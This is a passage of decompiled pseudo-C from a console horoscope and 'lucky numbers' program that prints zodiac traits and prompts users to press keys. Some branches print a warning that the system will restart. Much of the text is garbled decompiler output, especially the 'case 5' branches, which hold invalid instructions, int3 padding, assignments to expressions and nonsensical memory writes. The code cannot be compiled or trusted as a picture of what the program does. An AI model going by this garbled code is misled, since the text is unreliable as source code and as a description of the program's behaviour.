																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__esp = 0x10 + __esp;
																																								 *0x13fe250 = 0x90001;
																																								__eflags = __edi - 0xa;
																																								if(__edi <= 0xa) {
																																									_v20 = __edi;
																																									__eax = __edi;
																																								} else {
																																									__eax = 0x66666667;
																																									__edx = 0x66666667 * __edi >> 0x20;
																																									__eax = 0x66666667 * __edi;
																																									__edx = 0x66666667 * __edi >> 0x20 >> 2;
																																									__eax = __edx + (__edx >> 0x1f);
																																									__edx = __eax + __eax * 4;
																																									__edx = __eax + __eax * 4 + __eax + __eax * 4;
																																									__eax = __edi;
																																									__eax = __edi - __edx;
																																									_v20 = __eax;
																																								}
																																								__eflags = __eax;
																																								if(__eax == 0) {
																																									_v20 = 5;
																																									__eax = _v20;
																																								}
																																								_v36 = __eax;
																																								__eax = __eax + __eax;
																																								__eax = __eax + __eax;
																																								__eflags = __eax;
																																								__eax = __ebp + __eax - 0x24;
																																								_v44 = 1;
																																								_v40 = __eax;
																																								while(1) {
																																									__eflags = _v36 - 0x2e;
																																									if(__eflags > 0) {
																																										break;
																																									}
																																									__ecx = _v40;
																																									__edx =  *_v40;
																																									_push(__edx);
																																									_push("\n\n%s");
																																									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																									_push("\nEnter any key....");
																																									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																									__esp = 0xc + __esp;
																																									__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																									__ecx = _v20;
																																									_v36 =  &(_v36[__ecx]);
																																									__eax = _v44;
																																									__ecx = __ecx + __ecx;
																																									_v40 =  &(_v40[__ecx]);
																																									__eax =  &(_v44[1]);
																																									_v44 = __eax;
																																									__eflags = __eax - 6;
																																									if(__eflags < 0) {
																																										continue;
																																									}
																																									break;
																																								}
																																								_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								_push("\n\n\n\n\nEnter any key.....");
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__esp = 8 + __esp;
																																								__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																								goto L290;
																																							case 1:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = _v12;
																																								__edx = __esi;
																																								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx) = E013D1A50();
																																								__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																																								goto L290;
																																							case 2:
																																								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																								__ecx = _v12;
																																								__edx = __esi;
																																								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx) = E013D1A50();
																																								_push("------------------------------------------------------------------");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								_push("------------------------------------------------------------------");
																																								 *0x13fe250 = 0x100005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx =  &(__edi[__edi]);
																																								__edx =  &(__edi[__edi]) +  &(__edi[__edi]);
																																								_push(__edx);
																																								_push("YOUR LUCKY NUMBERS ARE: %d\t");
																																								 *0x13fe250 = 0xc000a;
																																								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = __edi;
																																								asm("cdq");
																																								__edx = __edx & 0x00000007;
																																								__edi + __edx = __edi + __edx >> 3;
																																								__eax = __edi + (__edi + __edx >> 3);
																																								_push(__edi + (__edi + __edx >> 3));
																																								_push("%d\t");
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__ecx = __edi;
																																								__ecx = __edi << 5;
																																								__eax = 0x2aaaaaab;
																																								__edx = 0x2aaaaaab * __ecx >> 0x20;
																																								0x2aaaaaab * __ecx = __edx;
																																								__edx >> 0x1f = __edx + (__edx >> 0x1f);
																																								_push(__edx + (__edx >> 0x1f));
																																								_push("%d\t");
																																								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x66666667;
																																								__edx = 0x66666667 * __edi >> 0x20;
																																								__eax = 0x66666667 * __edi;
																																								__edx = 0x66666667 * __edi >> 0x20 >> 1;
																																								__edx = __edx >> 0x1f;
																																								__eax = __edx + (__edx >> 0x1f);
																																								__ecx = __eax + __eax * 4;
																																								_push(__eax + __eax * 4);
																																								_push("%d\t");
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								_push("Enter any key to continue...");
																																								 *0x13fe250 = 0x160032;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__esp = 0x38 + __esp;
																																								__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																								goto L290;
																																							case 3:
																																								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																								__ecx = _v12;
																																								__edx = __esi;
																																								E013D1C00(__ebx, __esi, __edi, __esi, __eflags, __ecx, __ebx) = E013D1A50();
																																								__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																																								__eax = __eax - 1;
																																								__eflags = __eax - 0xb;
																																								if(__eflags <= 0) {
																																									switch( *((intOrPtr*)(__eax * 4 +  &M013D7050))) {
																																										case 0:
																																											goto L277;
																																										case 1:
																																											goto L278;
																																										case 2:
																																											goto L279;
																																										case 3:
																																											goto L280;
																																										case 4:
																																											goto L281;
																																										case 5:
																																											goto L282;
																																										case 6:
																																											goto L283;
																																										case 7:
																																											goto L284;
																																										case 8:
																																											goto L285;
																																										case 9:
																																											goto L286;
																																										case 0xa:
																																											goto L287;
																																										case 0xb:
																																											goto L288;
																																									}
																																								}
																																								goto L290;
																																							case 4:
																																								_push(E013DB07D());
																																								__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																																								__esp = 4 + __esp;
																																								goto L290;
																																							case 5:
																																								__eax = E013DC543(0);
																																								asm("xlatb");
																																								__edi =  *0x3d6ac201 * 0x3d6aea01;
																																								 *((intOrPtr*)(__ebx + 0x6f86013d + __ebp * 2)) =  *((intOrPtr*)(__ebx + 0x6f86013d + __ebp * 2)) +  *0x3d6ac201 * 0x3d6aea01;
																																								__eflags = __eax - 0x3d702f01;
																																								__eax = __esi + __eax;
																																								__edi =  *0x3d6c3d01;
																																								__ch =  *( &(__edi[0]) + __ebp);
																																								asm("xlatb");
																																								asm("insb");
																																								__eflags = __eax - 0x3d6d2401;
																																								 *((intOrPtr*)(__ecx + 0x6d)) =  *((intOrPtr*)(__ecx + 0x6d)) + __esi;
																																								__eflags = __eax - 0x3d6dbe01;
																																								 *__ebx =  *__ebx + __ecx;
																																								asm("outsb");
																																								__eflags = __eax - 0x3d6e5801;
																																								_v234799794 = _v234799794 + __esp;
																																								asm("outsb");
																																								__eflags = __eax - 0x3d6f3c01;
																																								_t761 =  &_v149;
																																								 *_t761 = _v149 + __edx;
																																								__eflags =  *_t761;
																																								_push(__ebp);
																																								__ebp = __esp;
																																								__esp = __esp - 0x1c;
																																								_push(__ebx);
																																								_push(__esi);
																																								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																								__esi = _v416;
																																								_push(__esi);
																																								_push("Name: %s");
																																								 *0x13fe250 = 0x30037;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__ebx = _v420;
																																								0x7da = 0x7da - __ebx;
																																								_push(0x7da);
																																								_push("Age=%d");
																																								 *0x13fe250 = 0x40037;
																																								_v448 = 0x7da - __ebx;
																																								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v412;
																																								 *0x13fe250 = 0x50037;
																																								_v452 = _v412;
																																								_push(E013DC111(_v412));
																																								_push("Sex=%c");
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								_push("Your horoscope sign is Aquarius-The Water Bearer");
																																								 *0x13fe250 = 0x20003;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								_push("..-\"-._.-\"-._.-");
																																								 *0x13fe250 = 0x30005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								_push("..-\"-._.-\"-._.-\n\n");
																																								 *0x13fe250 = 0x40005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__esp = 0x2c + __esp;
																																								_v460 = "\n*  You have great desire for material gain.";
																																								_v456 = "\n*  You are tireless worker and are willing to work for what you want.";
																																								__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																																								__eax = __eax - 1;
																																								__eflags = __eax - 5;
																																								if(__eflags > 0) {
																																									L325:
																																									_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
																																									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																									__esp = 4 + __esp;
																																									__eax =  *0x13d0000();
																																									_pop(__esi);
																																									_pop(__ebx);
																																									return __eax;
																																								} else {
																																									_push(__edi);
																																									__edi = _v28;
																																									do {
																																										switch( *((intOrPtr*)(__eax * 4 +  &M013D77F0))) {
																																											case 0:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = _v16;
																																												__edx = __esi;
																																												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx) = E013D1AD0();
																																												_push("HERE IS WHAT YOU ARE!!!\n");
																																												 *0x13fe250 = 0x80001;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__esp = 0x10 + __esp;
																																												 *0x13fe250 = 0x90001;
																																												__eflags = __edi - 0xa;
																																												if(__edi <= 0xa) {
																																													_v24 = __edi;
																																													__eax = __edi;
																																												} else {
																																													__eax = 0x66666667;
																																													__edx = 0x66666667 * __edi >> 0x20;
																																													__eax = 0x66666667 * __edi;
																																													__edx = 0x66666667 * __edi >> 0x20 >> 2;
																																													__eax = __edx + (__edx >> 0x1f);
																																													__edx = __eax + __eax * 4;
																																													__edx = __eax + __eax * 4 + __eax + __eax * 4;
																																													__eax = __edi;
																																													__eax = __edi - __edx;
																																													_v24 = __eax;
																																												}
																																												__eflags = __eax;
																																												if(__eax == 0) {
																																													_v24 = 5;
																																													__eax = _v24;
																																												}
																																												_v40 = __eax;
																																												__eax = __eax + __eax;
																																												__eax = __eax + __eax;
																																												__eflags = __eax;
																																												__eax = __ebp + __eax - 0x20;
																																												_v48 = 1;
																																												_v44 = __eax;
																																												while(1) {
																																													__eflags = _v40 - 0x25;
																																													if(__eflags > 0) {
																																														break;
																																													}
																																													__ecx = _v44;
																																													__edx =  *_v44;
																																													_push(__edx);
																																													_push("\n\n%s");
																																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																													_push("\nEnter any key....");
																																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																													__esp = 0xc + __esp;
																																													__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																													__ecx = _v24;
																																													_v40 =  &(_v40[__ecx]);
																																													__eax = _v48;
																																													__ecx = __ecx + __ecx;
																																													_v44 =  &(_v44[__ecx]);
																																													__eax =  &(_v48[1]);
																																													_v48 = __eax;
																																													__eflags = __eax - 6;
																																													if(__eflags < 0) {
																																														continue;
																																													}
																																													break;
																																												}
																																												_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												_push("\n\n\n\n\nEnter any key.....");
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__esp = 8 + __esp;
																																												__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																												goto L323;
																																											case 1:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = _v16;
																																												__edx = __esi;
																																												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx) = E013D1AD0();
																																												__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																																												goto L323;
																																											case 2:
																																												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																												__ecx = _v16;
																																												__edx = __esi;
																																												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx) = E013D1AD0();
																																												_push("------------------------------------------------------------------");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												_push("------------------------------------------------------------------");
																																												 *0x13fe250 = 0x100005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = __edi;
																																												__edx = __edi * 0xb;
																																												_push(__edx);
																																												_push("YOUR LUCKY NUMBERS ARE: %d\t");
																																												 *0x13fe250 = 0xc000a;
																																												E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = __edi;
																																												__eax = __edi * __edi;
																																												asm("cdq");
																																												__ecx = 0xa;
																																												_t801 = __eax % 0xa;
																																												__eax = __eax / 0xa;
																																												__edx = _t801;
																																												_push(__edx);
																																												_push("%d\t");
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												 &(__edi[__edi]) =  &(__edi[__edi]) +  &(__edi[__edi]);
																																												__ecx =  &(__edi[__edi]) +  &(__edi[__edi]) +  &(__edi[__edi]) +  &(__edi[__edi]);
																																												__eax = 0x38e38e39;
																																												__edx = 0x38e38e39 * __ecx >> 0x20;
																																												__eax = 0x38e38e39 * __ecx;
																																												__edx = 0x38e38e39 * __ecx >> 0x20 >> 1;
																																												__edx = __edx >> 0x1f;
																																												__eax = __edx + (__edx >> 0x1f);
																																												_push(__edx + (__edx >> 0x1f));
																																												_push("%d\t");
																																												E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x2aaaaaab;
																																												__edx = 0x2aaaaaab * __edi >> 0x20;
																																												0x2aaaaaab * __edi = __edx;
																																												__eax = __edx >> 0x1f;
																																												__eax = __edx + (__edx >> 0x1f);
																																												__eax + __eax * 2 = __eax + __eax * 2 + __eax + __eax * 2;
																																												_push(__eax + __eax * 2 + __eax + __eax * 2);
																																												_push("%d\t");
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												_push("Enter any key to continue...");
																																												 *0x13fe250 = 0x160032;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__esp = 0x38 + __esp;
																																												__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																												goto L323;
																																											case 3:
																																												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																												__ecx = _v16;
																																												__edx = __esi;
																																												E013D1C00(__ebx, __esi, __edi, __esi, __eflags, __ecx, __ebx) = E013D1AD0();
																																												__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																																												__eax = __eax - 1;
																																												__eflags = __eax - 0xb;
																																												if(__eflags <= 0) {
																																													switch( *((intOrPtr*)(__eax * 4 +  &M013D7808))) {
																																														case 0:
																																															goto L310;
																																														case 1:
																																															goto L311;
																																														case 2:
																																															goto L312;
																																														case 3:
																																															goto L313;
																																														case 4:
																																															goto L314;
																																														case 5:
																																															goto L315;
																																														case 6:
																																															goto L316;
																																														case 7:
																																															goto L317;
																																														case 8:
																																															goto L318;
																																														case 9:
																																															goto L319;
																																														case 0xa:
																																															goto L320;
																																														case 0xb:
																																															goto L321;
																																													}
																																												}
																																												goto L323;
																																											case 4:
																																												_push(E013DB07D());
																																												__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																																												__esp = 4 + __esp;
																																												__eax = E013D1E40(__edi);
																																												goto L323;
																																											case 5:
																																												__eax = E013DC543(0);
																																												_push(__edi);
																																												if(__eflags >= 0) {
																																													L334:
																																													if(__eflags > 0) {
																																														__eflags = __eax - 0x3d76c001;
																																														__esp = __esp + __ecx;
																																														asm("int3");
																																														asm("int3");
																																														asm("int3");
																																														asm("int3");
																																														asm("int3");
																																														asm("int3");
																																														asm("int3");
																																														_push(__ebp);
																																														__ebp = __esp;
																																														__esp = __esp - 0x20;
																																														goto L337;
																																													}
																																												} else {
																																													__edx[0x1c] = __edx[0x1c] + __eax;
																																													__eflags = __eax - 0x3d726a01;
																																													 *((intOrPtr*)(__eax + 0x73)) =  *((intOrPtr*)(__eax + 0x73)) + __eax;
																																													__eflags = __eax - 0x3d770a01;
																																													__eax = __eax + __ebp;
																																													__eflags = __eax;
																																													if(__eax > 0) {
																																														L337:
																																														asm("in al, dx");
																																														_t863 = __ebx + 0x57;
																																														 *_t863 =  *(__ebx + 0x57) & __dl;
																																														__eflags =  *_t863;
																																														_push("cls");
																																														goto L338;
																																													} else {
																																														 *((intOrPtr*)(__ebx + 0x3d + __esi * 2)) =  *((intOrPtr*)(__ebx + 0x3d + __esi * 2)) + __esi;
																																														__ecx = __ecx + __eax;
																																														__eflags = __ecx;
																																														if(__ecx >= 0) {
																																															L338:
																																															__eax = __eax + __ebp;
																																															asm("invalid");
																																															goto L339;
																																														} else {
																																															 *__esi =  *__esi + __ecx;
																																															__eflags =  *__esi;
																																															if( *__esi == 0) {
																																																L339:
																																																 *__eax =  *__eax + __al;
																																																__eflags =  *__eax;
																																																__edi = _v24;
																																																_push(__edi);
																																																_push("Name: %s");
																																																 *0x13fe250 = 0x30037;
																																																goto L340;
																																															} else {
																																																 *((intOrPtr*)(__ebx + 0x74)) =  *((intOrPtr*)(__ebx + 0x74)) + __ebx;
																																																__eflags = __eax - 0x3d74a801;
																																																__ebp = __esi + __ebp;
																																																__eflags = __ebp;
																																																if(__ebp == 0) {
																																																	L340:
																																																	__eax = __eax + 0x13fe250;
																																																	asm("aaa");
																																																	 *__ebx =  *__ebx + __al;
																																																	__al = __al + __ch;
																																																	__eflags = __al;
																																																	__eax =  *__ecx;
																																																	goto L341;
																																																} else {
																																																	__edx[0x1d] = __edx[0x1d] + __eax;
																																																	__eflags = __eax - 0x3d758f01;
																																																	__esp = __esp + __ebx;
																																																	__eflags = __esp;
																																																	if(__esp != 0) {
																																																		L341:
																																																		 *__eax =  *__eax + __al;
																																																		__eflags =  *__eax;
																																																		__ebx = _v28;
																																																		goto L342;
																																																	} else {
																																																		 *__ecx =  *__ecx + __ebp;
																																																		__eflags =  *__ecx;
																																																		if( *__ecx <= 0) {
																																																			L342:
																																																			__al = __al | 0x000000b8;
																																																			asm("fiadd dword [edi]");
																																																			 *__eax =  *__eax + __al;
																																																			__eax = __eax - __ebx;
																																																			__eflags = __eax;
																																																			_push(__eax);
																																																			_push("Age=%d");
																																																			 *0x13fe250 = 0x40037;
																																																			_v56 = __eax;
																																																			__eax = _v20;
																																																			 *0x13fe250 = 0x50037;
																																																			_v60 = _v20;
																																																			__eax = E013DC111(_v20);
																																																			_push(__eax);
																																																			_push("Sex=%c");
																																																		} else {
																																																			_t861 =  &(__esi[0x1d]);
																																																			 *_t861 = __esi + __esi[0x1d];
																																																			__eflags =  *_t861;
																																																			goto L334;
																																																		}
																																																	}
																																																}
																																															}
																																														}
																																													}
																																												}
																																												__eax = __eax + __ebp;
																																												__edi =  &(__edi[0]);
																																												__ecx = 1 + __ecx;
																																												 *__eax =  *__eax + __al;
																																												__esp = 0x20 + __esp;
																																												__eax = E013D1B10();
																																												_v68 = "\n*  You are kind and gullible.";
																																												_v64 = "\n*  You cannot hurt anyone directly.";
																																												_v60 = "\n*  You are adventurous, ambitious, impulsive, enthusiastic and full of energy.";
																																												__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																																												__eax = __eax - 1;
																																												__eflags = __eax - 5;
																																												if(__eflags > 0) {
																																													L374:
																																													_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
																																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																													__esp = 4 + __esp;
																																													__eax =  *0x13d0000();
																																													_pop(__edi);
																																													_pop(__ebx);
																																													return __eax;
																																												} else {
																																													_push(__esi);
																																													__esi = _v28;
																																													do {
																																														switch( *((intOrPtr*)(__eax * 4 +  &M013D7F60))) {
																																															case 0:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = _v16;
																																																__edx = __edi;
																																																E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx) = E013D1B10();
																																																_push("HERE IS WHAT YOU ARE!!!\n");
																																																 *0x13fe250 = 0x80001;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__esp = 0x10 + __esp;
																																																 *0x13fe250 = 0x90001;
																																																__eflags = __esi - 0xa;
																																																if(__esi <= 0xa) {
																																																	_v24 = __esi;
																																																	__eax = __esi;
																																																} else {
																																																	__eax = 0x66666667;
																																																	__edx = 0x66666667 * __esi >> 0x20;
																																																	__eax = 0x66666667 * __esi;
																																																	__edx = 0x66666667 * __esi >> 0x20 >> 2;
																																																	__eax = __edx + (__edx >> 0x1f);
																																																	__edx = __eax + __eax * 4;
																																																	__edx = __eax + __eax * 4 + __eax + __eax * 4;
																																																	__eax = __esi;
																																																	__eax = __esi - __edx;
																																																	_v24 = __eax;
																																																}
																																																__eflags = __eax;
																																																if(__eax == 0) {
																																																	_v24 = 5;
																																																	__eax = _v24;
																																																}
																																																_v40 = __eax;
																																																__eax = __eax + __eax;
																																																__eax = __eax + __eax;
																																																__eflags = __eax;
																																																__eax = __ebp + __eax - 0x24;
																																																_v48 = 1;
																																																_v44 = __eax;
																																																while(1) {
																																																	__eflags = _v40 - 0x36;
																																																	if(__eflags > 0) {
																																																		break;
																																																	}
																																																	__ecx = _v44;
																																																	__edx =  *_v44;
																																																	_push(__edx);
																																																	_push("\n\n%s");
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	_push("\nEnter any key....");
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	__esp = 0xc + __esp;
																																																	__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																																	__ecx = _v24;
																																																	_v40 =  &(_v40[__ecx]);
																																																	__eax = _v48;
																																																	__ecx = __ecx + __ecx;
																																																	_v44 =  &(_v44[__ecx]);
																																																	__eax =  &(_v48[1]);
																																																	_v48 = __eax;
																																																	__eflags = __eax - 6;
																																																	if(__eflags < 0) {
																																																		continue;
																																																	}
																																																	break;
																																																}
																																																_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																_push("\n\n\n\n\nEnter any key.....");
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__esp = 8 + __esp;
																																																__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																																goto L372;
																																															case 1:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = _v16;
																																																__edx = __edi;
																																																E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx) = E013D1B10();
																																																__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																																																goto L372;
																																															case 2:
																																																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																																__ecx = _v16;
																																																__edx = __edi;
																																																E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx) = E013D1B10();
																																																_push("------------------------------------------------------------------");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																_push("------------------------------------------------------------------");
																																																 *0x13fe250 = 0x100005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__esi + __esi * 2 = __esi + __esi * 2 + __esi + __esi * 2;
																																																__ecx = __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2;
																																																__eax = 0x66666667;
																																																__edx = 0x66666667 * __ecx >> 0x20;
																																																__eax = 0x66666667 * __ecx;
																																																__edx = 0x66666667 * __ecx >> 0x20 >> 2;
																																																__edx = __edx >> 0x1f;
																																																__eax = __edx + (__edx >> 0x1f);
																																																_push(__edx + (__edx >> 0x1f));
																																																_push("YOUR LUCKY NUMBERS ARE: %d\t");
																																																 *0x13fe250 = 0xc000a;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__esi = __esi * __esi;
																																																__ecx = __esi * __esi - 9;
																																																_push(__esi * __esi - 9);
																																																_push("%d\t");
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__ecx = __esi;
																																																__ecx = __esi * 0x2d;
																																																__eax = 0x66666667;
																																																__edx = 0x66666667 * __ecx >> 0x20;
																																																__eax = 0x66666667 * __ecx;
																																																__edx = 0x66666667 * __ecx >> 0x20 >> 2;
																																																__edx = __edx >> 0x1f;
																																																__eax = __edx + (__edx >> 0x1f);
																																																_push(__edx + (__edx >> 0x1f));
																																																_push("%d\t");
																																																E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x2aaaaaab;
																																																__edx = 0x2aaaaaab * __esi >> 0x20;
																																																0x2aaaaaab * __esi = __edx;
																																																__eax = __edx >> 0x1f;
																																																__eax = __edx + (__edx >> 0x1f);
																																																__ecx = __eax + __eax * 2;
																																																__esi = __esi - __eax + __eax * 2;
																																																__edx = __esi - __eax + __eax * 2 + __esi - __eax + __eax * 2;
																																																_push(__edx);
																																																_push("%d\t");
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																_push("Enter any key to continue...");
																																																 *0x13fe250 = 0x160032;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__esp = 0x38 + __esp;
																																																__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																																goto L372;
																																															case 3:
																																																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																																__edx = _v16;
																																																__edx = __edi;
																																																E013D1C00(__ebx, __edi, __edi, __esi, __eflags, _v16, __ebx) = E013D1B10();
																																																__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																																																__eax = __eax - 1;
																																																__eflags = __eax - 0xb;
																																																if(__eflags <= 0) {
																																																	switch( *((intOrPtr*)(__eax * 4 +  &M013D7F78))) {
																																																		case 0:
																																																			goto L359;
																																																		case 1:
																																																			goto L360;
																																																		case 2:
																																																			goto L361;
																																																		case 3:
																																																			goto L362;
																																																		case 4:
																																																			goto L363;
																																																		case 5:
																																																			goto L364;
																																																		case 6:
																																																			goto L365;
																																																		case 7:
																																																			goto L366;
																																																		case 8:
																																																			goto L367;
																																																		case 9:
																																																			goto L368;
																																																		case 0xa:
																																																			goto L369;
																																																		case 0xb:
																																																			goto L370;
																																																	}
																																																}
																																																goto L372;
																																															case 4:
																																																_push(E013DB07D());
																																																__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																																																__esp = 4 + __esp;
																																																__eax = E013D1E40(__edi);
																																																goto L372;
																																															case 5:
																																																__eax = E013DC543(0);
																																																asm("out 0x78, eax");
																																																__eflags = __eax - 0x3d79d201;
																																																__edx = __edx + __edi;
																																																__eflags = __edx;
																																																if(__edx >= 0) {
																																																	L387:
																																																	asm("int3");
																																																	asm("int3");
																																																	asm("int3");
																																																	asm("int3");
																																																	goto L388;
																																																} else {
																																																	__ecx = __ecx + __esp;
																																																	__eflags = __ecx;
																																																	if(__ecx != 0) {
																																																		L388:
																																																		asm("int3");
																																																		asm("int3");
																																																		asm("int3");
																																																		asm("int3");
																																																		_push(__ebp);
																																																		__ebp = __esp;
																																																		__esp = __esp - 0x20;
																																																		goto L390;
																																																	} else {
																																																		_t951 = __ebx + 0x59013d7e;
																																																		 *_t951 =  *(__ebx + 0x59013d7e) + __ebp;
																																																		__eflags =  *_t951;
																																																		_pop(__ecx);
																																																		if(__eflags > 0) {
																																																			L390:
																																																			asm("in al, dx");
																																																			_v950997987 = _v950997987 & __cl;
																																																			__ebp =  &_v39;
																																																			__eflags = __ebp;
																																																			goto L391;
																																																		} else {
																																																			 *0x62013d7b = __edx +  *0x62013d7b;
																																																			__eflags =  *0x62013d7b;
																																																			if(__eflags != 0) {
																																																				L391:
																																																				asm("in al, dx");
																																																				_push(__edx);
																																																				if(__eflags < 0) {
																																																					goto L406;
																																																				} else {
																																																					if(__eflags < 0) {
																																																						goto L382;
																																																					} else {
																																																						__ebp =  &_v39;
																																																						asm("lock jz 0x37");
																																																						goto L394;
																																																					}
																																																				}
																																																			} else {
																																																				_t953 = __edi - 0x3fec285;
																																																				 *_t953 =  *(__edi - 0x3fec285) + __ebp;
																																																				__eflags =  *_t953;
																																																				if(__eflags != 0) {
																																																					L394:
																																																					if(__eflags == 0) {
																																																						goto L402;
																																																					} else {
																																																						 *[fs:ebp-0xc] = 0x6c6c;
																																																						goto L396;
																																																					}
																																																				} else {
																																																					_t955 = __ecx + 0x7c;
																																																					 *_t955 =  *(__ecx + 0x7c) + __ecx;
																																																					__eflags =  *_t955;
																																																					L382:
																																																					if(__eflags < 0) {
																																																						L396:
																																																						_v52 = 0x6c6c;
																																																						_v50 = 0;
																																																						goto L397;
																																																					} else {
																																																						_t957 = __esi - 0x1cfec284;
																																																						 *_t957 = __edx +  *(__esi - 0x1cfec284);
																																																						__eflags =  *_t957;
																																																						if( *_t957 < 0) {
																																																							L397:
																																																							__eflags =  *__eax & 0x000000ff;
																																																							asm("adc eax, 0x13ef008");
																																																							goto L398;
																																																						} else {
																																																							 *__eax = __esi +  *__eax;
																																																							__eflags =  *__eax;
																																																							if( *__eax >= 0) {
																																																								L398:
																																																								__al = __al | __dh;
																																																								 *[ds:eax+0x24] =  *[ds:eax+0x24] + __ebp;
																																																								__eflags =  *[ds:eax+0x24];
																																																								if( *[ds:eax+0x24] != 0) {
																																																									goto L405;
																																																								} else {
																																																									 *(__eax - 1) =  *(__eax - 1) + __edx;
																																																									asm("adc eax, 0x13ef004");
																																																									goto L400;
																																																								}
																																																							} else {
																																																								_a85 = _a85 + __edi;
